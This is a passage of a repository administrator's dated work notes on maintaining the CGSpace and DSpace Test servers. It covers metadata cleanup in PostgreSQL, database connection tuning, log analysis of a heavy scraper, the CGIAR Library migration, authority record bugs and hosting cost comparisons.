  • Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours
  • +
+

2017-09-07

+
    +
  • Ask Sisay to clean up the WLE approvers a bit, as Marianne’s user account is both in the approvers step as well as the group
  • +
+

2017-09-10

+
    +
  • Delete 58 blank metadata values from the CGSpace database:
  • +
+
dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
+DELETE 58
+
    +
  • I also ran it on DSpace Test because we’ll be migrating the CGIAR Library soon and it would be good to catch these before we migrate
  • +
  • Run system updates and restart DSpace Test
  • +
  • We only have 7.7GB of free space on DSpace Test so I need to copy some data off of it before doing the CGIAR Library migration (requires lots of exporting and creating temp files)
  • +
  • I still have the original data from the CGIAR Library so I’ve zipped it up and sent it off to linode18 for now
  • +
  • sha256sum of original-cgiar-library-6.6GB.tar.gz is: bcfabb52f51cbdf164b61b7e9b3a0e498479e4c1ed1d547d32d11f44c0d5eb8a
  • +
  • Start doing a test run of the CGIAR Library migration locally
  • +
  • Notes and todo checklist here for now: https://gist.github.com/alanorth/3579b74e116ab13418d187ed379abd9c
  • +
  • Create pull request for Phase I and II changes to CCAFS Project Tags: #336
  • +
  • We’ve been discussing with Macaroni Bros and CCAFS for the past month or so and the list of tags was recently finalized
  • +
  • There will need to be some metadata updates — though if I recall correctly it is only about seven records — for that as well, I had made some notes about it in 2017-07, but I’ve asked for more clarification from Lili just in case
  • +
  • Looking at the DSpace logs to see if we’ve had a change in the “Cannot get a connection” errors since last month when we adjusted the db.maxconnections parameter on CGSpace:
  • +
+
# grep -c "Cannot get a connection, pool error Timeout waiting for idle object" dspace.log.2017-09-*
+dspace.log.2017-09-01:0
+dspace.log.2017-09-02:0
+dspace.log.2017-09-03:9
+dspace.log.2017-09-04:17
+dspace.log.2017-09-05:752
+dspace.log.2017-09-06:0
+dspace.log.2017-09-07:0
+dspace.log.2017-09-08:10
+dspace.log.2017-09-09:0
+dspace.log.2017-09-10:0
+
    +
  • Also, since last month (2017-08) Macaroni Bros no longer runs their REST API scraper every hour, so I’m sure that helped
  • +
  • There are still some errors, though, so maybe I should bump the connection limit up a bit
  • +
  • I remember seeing that Munin shows that the average number of connections is 50 (which is probably mostly from the XMLUI) and we’re currently allowing 40 connections per app, so maybe it would be good to bump that value up to 50 or 60 along with the system’s PostgreSQL max_connections (formula should be: webapps * 60 + 3, or 3 * 60 + 3 = 183 in our case)
  • +
  • I updated both CGSpace and DSpace Test to use these new settings (60 connections per web app and 183 for system PostgreSQL limit)
  • +
  • I’m expecting to see 0 connection errors for the next few months
  • +
+

2017-09-11

+ +

2017-09-12

+
    +
  • I was testing the METS XSD caching during AIP ingest but it doesn’t seem to help actually
  • +
  • The import process takes the same amount of time with and without the caching
  • +
  • Also, I captured TCP packets destined for port 80 and both imports only captured ONE packet (an update check from some component in Java):
  • +
+
$ sudo tcpdump -i en0 -w without-cached-xsd.dump dst port 80 and 'tcp[32:4] = 0x47455420'
+
    +
  • Great TCP dump guide here: https://danielmiessler.com/study/tcpdump
  • +
  • The last part of that command filters for HTTP GET requests, of which there should have been many to fetch all the XSD files for validation
  • +
  • I sent a message to the mailing list to see if anyone knows more about this
  • +
  • In looking at the tcpdump results I notice that there is an update check to the ehcache server on every iteration of the ingest loop, for example:
  • +
+
09:39:36.008956 IP 192.168.8.124.50515 > 157.189.192.67.http: Flags [P.], seq 1736833672:1736834103, ack 147469926, win 4120, options [nop,nop,TS val 1175113331 ecr 550028064], length 431: HTTP: GET /kit/reflector?kitID=ehcache.default&pageID=update.properties&id=2130706433&os-name=Mac+OS+X&jvm-name=Java+HotSpot%28TM%29+64-Bit+Server+VM&jvm-version=1.8.0_144&platform=x86_64&tc-version=UNKNOWN&tc-product=Ehcache+Core+1.7.2&source=Ehcache+Core&uptime-secs=0&patch=UNKNOWN HTTP/1.1
+
    +
  • Turns out this is a known issue and Ehcache has refused to make it opt-in: https://jira.terracotta.org/jira/browse/EHC-461
  • +
  • But we can disable it by adding an updateCheck="false" attribute to the main <ehcache > tag in dspace-services/src/main/resources/caching/ehcache-config.xml
  • +
  • After re-compiling and re-deploying DSpace I no longer see those update checks during item submission
  • +
  • I had a Skype call with Bram Luyten from Atmire to discuss various issues related to ORCID in DSpace +
      +
    • First, ORCID is deprecating their version 1 API (which DSpace uses) and in version 2 API they have removed the ability to search for users by name
    • +
    • The logic is that searching by name actually isn’t very useful because ORCID is essentially a global phonebook and there are tons of legitimately duplicate and ambiguous names
    • +
    • Atmire’s proposed integration would work by having users lookup and add authors to the authority core directly using their ORCID ID itself (this would happen during the item submission process or perhaps as a standalone / batch process, for example to populate the authority core with a list of known ORCIDs)
    • +
    • Once the association between name and ORCID is made in the authority then it can be autocompleted in the lookup field
    • +
    • Ideally there could also be a user interface for cleanup and merging of authorities
    • +
    • He will prepare a quote for us, keeping in mind that this could be useful to contribute back to the community for a 5.x release
    • +
    • As far as exposing ORCIDs as flat metadata along side all other metadata, he says this should be possible and will work on a quote for us
    • +
    +
  • +
+

2017-09-13

+
    +
  • Last night Linode sent an alert about CGSpace (linode18) that it has exceeded the outbound traffic rate threshold of 10Mb/s for the last two hours
  • +
  • I wonder what was going on, and looking into the nginx logs I think maybe it’s OAI…
  • +
  • Here is yesterday’s top ten IP addresses making requests to /oai:
  • +
+
# awk '{print $1}' /var/log/nginx/oai.log | sort -n | uniq -c | sort -h | tail -n 10
+      1 213.136.89.78
+      1 66.249.66.90
+      1 66.249.66.92
+      3 68.180.229.31
+      4 35.187.22.255
+  13745 54.70.175.86
+  15814 34.211.17.113
+  15825 35.161.215.53
+  16704 54.70.51.7
+
    +
  • Compared to the previous day’s logs it looks VERY high:
  • +
+
# awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
+      1 207.46.13.39
+      1 66.249.66.93
+      2 66.249.66.91
+      4 216.244.66.194
+     14 66.249.66.90
+
    +
  • The user agents for those top IPs are: +
      +
    • 54.70.175.86: API scraper
    • +
    • 34.211.17.113: API scraper
    • +
    • 35.161.215.53: API scraper
    • +
    • 54.70.51.7: API scraper
    • +
    +
  • +
  • And this user agent has never been seen before today (or at least recently!):
  • +
+
# grep -c "API scraper" /var/log/nginx/oai.log
+62088
+# zgrep -c "API scraper" /var/log/nginx/oai.log.*.gz
+/var/log/nginx/oai.log.10.gz:0
+/var/log/nginx/oai.log.11.gz:0
+/var/log/nginx/oai.log.12.gz:0
+/var/log/nginx/oai.log.13.gz:0
+/var/log/nginx/oai.log.14.gz:0
+/var/log/nginx/oai.log.15.gz:0
+/var/log/nginx/oai.log.16.gz:0
+/var/log/nginx/oai.log.17.gz:0
+/var/log/nginx/oai.log.18.gz:0
+/var/log/nginx/oai.log.19.gz:0
+/var/log/nginx/oai.log.20.gz:0
+/var/log/nginx/oai.log.21.gz:0
+/var/log/nginx/oai.log.22.gz:0
+/var/log/nginx/oai.log.23.gz:0
+/var/log/nginx/oai.log.24.gz:0
+/var/log/nginx/oai.log.25.gz:0
+/var/log/nginx/oai.log.26.gz:0
+/var/log/nginx/oai.log.27.gz:0
+/var/log/nginx/oai.log.28.gz:0
+/var/log/nginx/oai.log.29.gz:0
+/var/log/nginx/oai.log.2.gz:0
+/var/log/nginx/oai.log.30.gz:0
+/var/log/nginx/oai.log.3.gz:0
+/var/log/nginx/oai.log.4.gz:0
+/var/log/nginx/oai.log.5.gz:0
+/var/log/nginx/oai.log.6.gz:0
+/var/log/nginx/oai.log.7.gz:0
+/var/log/nginx/oai.log.8.gz:0
+/var/log/nginx/oai.log.9.gz:0
+
    +
  • Some of these heavy users are also using XMLUI, and their user agent isn’t matched by the Tomcat Session Crawler valve, so each request uses a different session
  • +
  • Yesterday alone the IP addresses using the API scraper user agent were responsible for 16,000 sessions in XMLUI:
  • +
+
# grep -a -E "(54.70.51.7|35.161.215.53|34.211.17.113|54.70.175.86)" /home/cgspace.cgiar.org/log/dspace.log.2017-09-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+15924
+
    +
  • If this continues I will definitely need to figure out who is responsible for this scraper and add their user agent to the session crawler valve regex (a sketch follows the OAI warning below)
  • +
  • A search for “API scraper” user agent on Google returns a robots.txt with a comment that this is the Yewno bot: http://www.escholarship.org/robots.txt
  • +
  • Also, in looking at the DSpace logs I noticed a warning from OAI that I should look into:
  • +
+
WARN  org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
+
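  • Going back to the crawler sessions above, adding this scraper’s user agent to the Crawler Session Manager Valve in Tomcat’s server.xml would look roughly like this (a sketch; the base regex shown is Tomcat’s default and may differ on CGSpace):

<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
       crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*API scraper.*" />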
    +
  • Looking at the spreadsheet with deletions and corrections that CCAFS sent last week
  • +
  • It appears they want to delete a lot of metadata, which I’m not sure they realize the implications of:
  • +
+
dspace=# select text_value, count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange') group by text_value;                                                                                                                                                                                                                  
+        text_value        | count                              
+--------------------------+-------                             
+ FP4_ClimateModels        |     6                              
+ FP1_CSAEvidence          |     7                              
+ SEA_UpscalingInnovation  |     7                              
+ FP4_Baseline             |    69                              
+ WA_Partnership           |     1                              
+ WA_SciencePolicyExchange |     6                              
+ SA_GHGMeasurement        |     2                              
+ SA_CSV                   |     7                              
+ EA_PAR                   |    18                              
+ FP4_Livestock            |     7                              
+ FP4_GenderPolicy         |     4                              
+ FP2_CRMWestAfrica        |    12                              
+ FP4_ClimateData          |    24                              
+ FP4_CCPAG                |     2                              
+ SEA_mitigationSAMPLES    |     2                              
+ SA_Biodiversity          |     1                              
+ FP4_PolicyEngagement     |    20                              
+ FP3_Gender               |     9                              
+ FP4_GenderToolbox        |     3                              
+(19 rows)
+
    +
  • I sent CCAFS people an email to ask if they really want to remove these 200+ tags
  • +
  • She responded yes, so I’ll at least need to do these deletes in PostgreSQL:
  • +
+
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
+DELETE 207
+
    +
  • When we discussed this in late July there were some other renames they had requested, but I don’t see them in the current spreadsheet so I will have to follow that up
  • +
  • I talked to Macaroni Bros and they said to just go ahead with the other corrections as well, as their spreadsheet evolved organically rather than systematically!
  • +
  • The final list of corrections and deletes should therefore be:
  • +
+
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
+update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
+update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
+delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
+delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
+
    +
  • Create and merge pull request to shut up the Ehcache update check (#337)
  • +
  • Although it looks like there was a previous attempt to disable these update checks that was merged in DSpace 4.0 (although it only affects XMLUI): https://jira.duraspace.org/browse/DS-1492
  • +
  • I commented there suggesting that we disable it globally
  • +
  • I merged the changes to the CCAFS project tags (#336) but still need to finalize the metadata deletions/renames
  • +
  • I merged the CGIAR Library theme changes (#338) to the 5_x-prod branch in preparation for next week’s migration
  • +
  • I emailed the Handle administrators (hdladmin@cnri.reston.va.us) to ask them what the process is for having their prefix resolved by our resolver
  • +
  • They responded and said that they need email confirmation from the contact of record of the other prefix, so I should have the CGIAR System Organization people email them before I send the new sitebndl.zip
  • +
  • Testing to see how we end up with all these new authorities after we keep cleaning and merging them in the database
  • +
  • Here are all my distinct authority combinations in the database before:
  • +
+
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
+ text_value |              authority               | confidence 
+------------+--------------------------------------+------------
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |        600
+ Orth, A.   | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |         -1
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |          0
+ Orth, Alan | 0d575fa3-8ac4-4763-a90a-1248d4791793 |         -1
+ Orth, Alan | 67a9588f-d86a-4155-81a2-af457e9d13f9 |        600
+(8 rows)
+
    +
  • And then after adding a new item and selecting an existing “Orth, Alan” with an ORCID in the author lookup:
  • +
+
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
+ text_value |              authority               | confidence 
+------------+--------------------------------------+------------
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |        600
+ Orth, A.   | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |         -1
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |          0
+ Orth, Alan | cb3aa5ae-906f-4902-97b1-2667cf148dde |        600
+ Orth, Alan | 0d575fa3-8ac4-4763-a90a-1248d4791793 |         -1
+ Orth, Alan | 67a9588f-d86a-4155-81a2-af457e9d13f9 |        600
+(9 rows)
+
    +
  • It created a new authority… let’s try to add another item and select the same existing author and see what happens in the database:
  • +
+
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
+ text_value |              authority               | confidence 
+------------+--------------------------------------+------------
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |        600
+ Orth, A.   | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |         -1
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |          0
+ Orth, Alan | cb3aa5ae-906f-4902-97b1-2667cf148dde |        600
+ Orth, Alan | 0d575fa3-8ac4-4763-a90a-1248d4791793 |         -1
+ Orth, Alan | 67a9588f-d86a-4155-81a2-af457e9d13f9 |        600
+(9 rows)
+
    +
  • No new one… so now let me try to add another item and select the italicized result from the ORCID lookup and see what happens in the database:
  • +
+
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
+ text_value |              authority               | confidence 
+------------+--------------------------------------+------------
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | d85a8a5b-9b82-4aaf-8033-d7e0c7d9cb8f |        600
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |        600
+ Orth, A.   | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |         -1
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |          0
+ Orth, Alan | cb3aa5ae-906f-4902-97b1-2667cf148dde |        600
+ Orth, Alan | 0d575fa3-8ac4-4763-a90a-1248d4791793 |         -1
+ Orth, Alan | 67a9588f-d86a-4155-81a2-af457e9d13f9 |        600
+(10 rows)
+
    +
  • Shit, it created another authority! Let’s try it again!
  • +
+
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';                                                                                             
+ text_value |              authority               | confidence
+------------+--------------------------------------+------------
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | d85a8a5b-9b82-4aaf-8033-d7e0c7d9cb8f |        600
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |        600
+ Orth, Alan | 9aed566a-a248-4878-9577-0caedada43db |        600
+ Orth, A.   | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |         -1
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |          0
+ Orth, Alan | cb3aa5ae-906f-4902-97b1-2667cf148dde |        600
+ Orth, Alan | 0d575fa3-8ac4-4763-a90a-1248d4791793 |         -1
+ Orth, Alan | 67a9588f-d86a-4155-81a2-af457e9d13f9 |        600
+(11 rows)
+
    +
  • It added another authority… surely this is not the desired behavior, or maybe we are not using this as intended?
  • +
+

2017-09-14

+
    +
  • Communicate with Handle.net admins to try to get some guidance about the 10947 prefix
  • +
  • Michael Marus is the contact for their prefix, but he has left CGIAR; since I actually have access to the CGIAR Library server I think I can just generate a new sitebndl.zip file from their server and send it to Handle.net
  • +
  • Also, Handle.net says their prefix is up for annual renewal next month so we might want to just pay for it and take it over
  • +
  • CGSpace was very slow and Uptime Robot even said it was down at one time
  • +
  • I didn’t see any abnormally high usage in the REST or OAI logs, but looking at Munin I see the average JVM usage was at 4.9GB and the heap is only 5GB (5120M), so I think it’s just normal growing pains
  • +
  • Every few months I generally try to increase the JVM heap to be 512M higher than the average usage reported by Munin, so now I adjusted it to 5632M
  • +
+
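  • As a note to self, the change itself is just the -Xms/-Xmx values in the Tomcat environment file that Ansible manages; a hedged sketch (the other flags here are only illustrative):
JAVA_OPTS="-Djava.awt.headless=true -Xms5632m -Xmx5632m -Dfile.encoding=UTF-8"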

2017-09-15

+
    +
  • Apply CCAFS project tag corrections on CGSpace:
  • +
+
dspace=# \i /tmp/ccafs-projects.sql 
+DELETE 5
+UPDATE 4
+UPDATE 1
+DELETE 1
+DELETE 207
+

2017-09-17

+
    +
  • Create pull request for CGSpace to be able to resolve multiple handles (#339)
  • +
  • We still need to do the changes to config.dct and regenerate the sitebndl.zip to send to the Handle.net admins
  • +
  • According to this dspace-tech mailing list entry from 2011, we need to add the extra handle prefixes to config.dct like this:
  • +
+
"server_admins" = (
+"300:0.NA/10568"
+"300:0.NA/10947"
+)
+
+"replication_admins" = (
+"300:0.NA/10568"
+"300:0.NA/10947"
+)
+
+"backup_admins" = (
+"300:0.NA/10568"
+"300:0.NA/10947"
+)
+
    +
  • More work on the CGIAR Library migration test run locally, as I was having problems importing the last fourteen items from the CGIAR System Management Office community
  • +
  • The problem was that we remapped the items to new collections after the initial import, so the items were using the 10947 prefix but the community and collection were using 10568
  • +
  • I ended up having to read the AIP Backup and Restore documentation closely a few times and then explicitly preserve handles and ignore parents:
  • +
+
$ for item in 10568-93759/ITEM@10947-46*; do ~/dspace/bin/dspace packager -r -t AIP -o ignoreHandle=false -o ignoreParent=true -e aorth@mjanja.ch -p 10568/87738 $item; done
+
    +
  • Also, this was in replace mode (-r) rather than submit mode (-s), because submit mode always generated a new handle even if I told it not to!
  • +
  • I decided to start the import process in the evening rather than waiting for the morning, and right as the first community was finished importing I started seeing Timeout waiting for idle object errors
  • +
  • I had to cancel the import, clean up a bunch of database entries, increase the PostgreSQL max_connections as a precaution, restart PostgreSQL and Tomcat, and then finally completed the import
  • +
+

2017-09-18

+
    +
  • I think we should force regeneration of all thumbnails in the CGIAR Library community, as their DSpace was version 1.7 and CGSpace is running DSpace 5.5, so the new thumbnails should look much better
  • +
  • One item for comparison:
  • +
+

With original DSpace 1.7 thumbnail

+

After DSpace 5.5

+
    +
  • Moved the CGIAR Library Migration notes to a page — cgiar-library-migration — as there seems to be a bug with post slugs defined in frontmatter when you have a permalink scheme defined in config.toml (happens currently in Hugo 0.27.1 at least)
  • +
+

2017-09-19

+
    +
  • Nightly Solr indexing is working again, and it appears to be pretty quick actually:
  • +
+
2017-09-19 00:00:14,953 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Processing (0 of 65808): 17607
+...
+2017-09-19 00:04:18,017 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Processing (65807 of 65808): 83753
+
+

2017-09-20

+
    +
  • Abenet and I noticed that hdl.handle.net is blocked by ETC at ILRI Addis so I asked Biruk Debebe to route it over the satellite
  • +
  • Force thumbnail regeneration for the CGIAR System Organization’s Historic Archive community (2000 items):
  • +
+
$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -f -i 10947/1 -p "ImageMagick PDF Thumbnail"
+
    +
  • I’m still waiting (over 1 day later) to hear back from the CGIAR System Organization about updating the DNS for library.cgiar.org
  • +
+

2017-09-21

+
    +
  • Switch to OpenJDK 8 from Oracle JDK on DSpace Test
  • +
  • I want to test this for a while to see if we can start using it instead
  • +
  • I need to look at the JVM graphs in Munin, test the Atmire modules, build the source, etc to get some impressions
  • +
+

2017-09-22

+ +

2017-09-24

+
    +
  • Start investigating other platforms for CGSpace due to linear instance pricing on Linode
  • +
  • We need to figure out how much memory is used by applications, caches, etc, and how much disk space the asset store needs
  • +
  • First, here’s the last week of memory usage on CGSpace and DSpace Test:
  • +
+

CGSpace memory week +DSpace Test memory week

+
    +
  • 8GB of RAM seems to be good for DSpace Test for now, with Tomcat’s JVM heap taking 3GB, caches and buffers taking 3–4GB, and then ~1GB unused
  • +
  • 24GB of RAM is way too much for CGSpace, with Tomcat’s JVM heap taking 5.5GB and caches and buffers happily using 14GB or so
  • +
  • As far as disk space, the CGSpace assetstore currently uses 51GB and Solr cores use 86GB (mostly in the statistics core)
  • +
  • DSpace Test currently doesn’t even have enough space to store a full copy of CGSpace, as its Linode instance only has 96GB of disk space
  • +
  • I’ve heard Google Cloud is nice (cheap and performant) but it’s definitely more complicated than Linode, and the instances aren’t enough cheaper to make it worth it
  • +
  • Here are some theoretical instances on Google Cloud: +
      +
    • DSpace Test, n1-standard-2 with 2 vCPUs, 7.5GB RAM, 300GB persistent SSD: $99/month
    • +
    • CGSpace, n1-standard-4 with 4 vCPUs, 15GB RAM, 300GB persistent SSD: $148/month
    • +
    +
  • +
  • Looking at Linode’s instance pricing, for DSpace Test it seems we could use the same 8GB instance for $40/month, and then add block storage of ~300GB for $30 (block storage is currently in beta and priced at $0.10/GiB)
  • +
  • For CGSpace we could use the cheaper 12GB instance for $80 and then add block storage of 500GB for $50
  • +
  • I’ve sent Peter a message about moving DSpace Test to the New Jersey data center so we can test the block storage beta
  • +
  • Create pull request for adding ISI Journal to search filters (#341)
  • +
  • Peter asked if we could map all the items of type Journal Article in ILRI Archive to ILRI articles in journals and newsletters
  • +
  • It is easy to do via CSV using OpenRefine but I noticed that on CGSpace ~1,000 of the expected 2,500 are already mapped, while on DSpace Test they were not
  • +
  • I’ve asked Peter if he knows what’s going on (or who mapped them)
  • +
  • Turns out he had already mapped some, but requested that I finish the rest
  • +
  • With this GREL in OpenRefine I can find items that are mapped, ie they have 10568/3|| or 10568/3$ in their collection field:
  • +
+
isNotNull(value.match(/.+?10568\/3(\|\|.+|$)/))
+
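  • For reference, mapping the rest is just a matter of appending the target collection’s handle to the collection column and re-importing the CSV, roughly like this (the item id and owning collection handle here are hypothetical; 10568/3 is the mapped collection from the GREL above):
id,collection
12345,10568/123||10568/3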
    +
  • Peter also made a lot of changes to the data in the Archives collections while I was attempting to import the changes, so we were essentially competing for PostgreSQL and Solr connections
  • +
  • I ended up having to kill the import and wait until he was done
  • +
  • I exported a clean CSV and applied the changes from that one, which was a hundred or two less than I thought there should be (at least compared to the current state of DSpace Test, which is a few months old)
  • +
+

2017-09-25

+
    +
  • Email Rosemary Kande from ICT to ask about the administrative / finance procedure for moving DSpace Test from EU to US region on Linode
  • +
  • Communicate (finally) with Tania and Tunji from the CGIAR System Organization office to tell them to request CGNET make the DNS updates for library.cgiar.org
  • +
  • Peter wants me to clean up the text values for Delia Grace’s metadata, as the authorities are all messed up again since we cleaned them up in 2016-12:
  • +
+
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';                                  
+  text_value  |              authority               | confidence              
+--------------+--------------------------------------+------------             
+ Grace, Delia |                                      |        600              
+ Grace, Delia | bfa61d7c-7583-4175-991c-2e7315000f0c |        600              
+ Grace, Delia | bfa61d7c-7583-4175-991c-2e7315000f0c |         -1              
+ Grace, D.    | 6a8ddca3-33c1-45f9-aa00-6fa9fc91e3fc |         -1
+
    +
  • Strangely, none of her authority entries have ORCIDs anymore…
  • +
  • I’ll just fix the text values and forget about it for now:
  • +
+
dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
+UPDATE 610
+
    +
  • After this we have to reindex the Discovery and Authority cores (as tomcat7 user):
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
+
+real    83m56.895s
+user    13m16.320s
+sys     2m17.917s
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-authority -b
+Retrieving all data
+Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
+Exception: null
+java.lang.NullPointerException
+        at org.dspace.authority.AuthorityValueGenerator.generateRaw(AuthorityValueGenerator.java:82)
+        at org.dspace.authority.AuthorityValueGenerator.generate(AuthorityValueGenerator.java:39)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.prepareNextValue(DSpaceAuthorityIndexer.java:201)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:132)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:159)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.AuthorityIndexClient.main(AuthorityIndexClient.java:61)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+
+real    6m6.447s
+user    1m34.010s
+sys     0m12.113s
+
    +
  • The index-authority script always seems to fail; I think it’s the same old bug
  • +
  • Something interesting for my notes about JNDI database pool—since I couldn’t determine if it was working or not when I tried it locally the other day—is this error message that I just saw in the DSpace logs today:
  • +
+
ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspaceLocal
+...
+INFO  org.dspace.storage.rdbms.DatabaseManager @ Unable to locate JNDI dataSource: jdbc/dspaceLocal
+INFO  org.dspace.storage.rdbms.DatabaseManager @ Falling back to creating own Database pool
+
    +
  • So it’s good to know that something gets printed when it fails because I didn’t see any mention of JNDI before when I was testing!
  • +
+

2017-09-26

+
    +
  • Adam Hunt from WLE finally registered so I added him to the editor and approver groups
  • +
  • Then I noticed that Sisay never removed Marianne’s user accounts from the approver steps in the workflow, even though she is already in the WLE groups, which are in those steps
  • +
  • For what it’s worth, I had asked him to remove them on 2017-09-14
